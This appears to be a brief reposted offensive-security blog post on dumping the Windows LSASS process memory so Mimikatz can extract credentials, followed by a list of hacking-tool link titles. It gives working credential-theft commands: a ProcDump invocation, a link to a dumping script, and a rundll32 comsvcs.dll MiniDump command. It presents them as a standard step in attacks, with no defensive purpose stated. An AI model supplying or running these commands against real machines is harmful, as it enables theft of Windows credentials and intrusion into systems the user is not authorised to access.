LSASS Dumping Methods ( For Mimikatz )

In every attack we need to get the windows credentials, this super important task. We need to target "LSASS.EXE" process and dump the process memory so that we can use it for extracting credentials using Mimikatz.


Here are some of the important methods,

Using ProcDump :

1. Favorite method of dumping is using "procdump.exe". This tool is from Microsoft Pstools
2. Download ProcDump.exe and upload in on remote system
3. Command : "procdump -ma lsass.exe lsass.dmp"


Using VB Script :

Download script from here :
https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp

rundll32 Command :

Essentially previous method VBS script is using following command for dumping Lsass.exe process

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full

So in case you do not have VB Script with you still you can fire-up the command and dump LSASS process.

This article is the property of Tenochtitlan Offensive Security. Verlo Completo --> https://tenochtitlan-sec.blogspot.com

More articles

1. Hacker Tools For Ios
2. Computer Hacker
3. Pentest Tools Port Scanner
4. Pentest Tools Alternative
5. Pentest Tools For Mac
6. Black Hat Hacker Tools
7. How To Hack
8. New Hack Tools
9. Bluetooth Hacking Tools Kali
10. Hacker Hardware Tools
11. Tools 4 Hack
12. Hack Tool Apk
13. Growth Hacker Tools
14. Hacker Search Tools
15. Underground Hacker Sites
16. Hacker Tools Free
17. Hacker Tool Kit
18. Hacking Tools For Beginners
19. Hacker Tools For Ios
20. Pentest Tools Port Scanner